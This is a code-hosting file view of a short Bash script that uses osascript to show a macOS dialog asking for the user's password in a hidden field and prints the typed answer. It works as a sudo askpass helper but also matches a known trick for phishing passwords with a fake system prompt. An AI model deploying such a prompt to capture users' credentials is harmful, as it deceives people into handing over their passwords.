3 lines
154 B
Bash
Executable File
3 lines
154 B
Bash
Executable File
#!/bin/bash
|
|
osascript -e 'display dialog "Password:" with hidden answer default answer "" with title "Password for '$USER'"' -e 'text returned of result'
|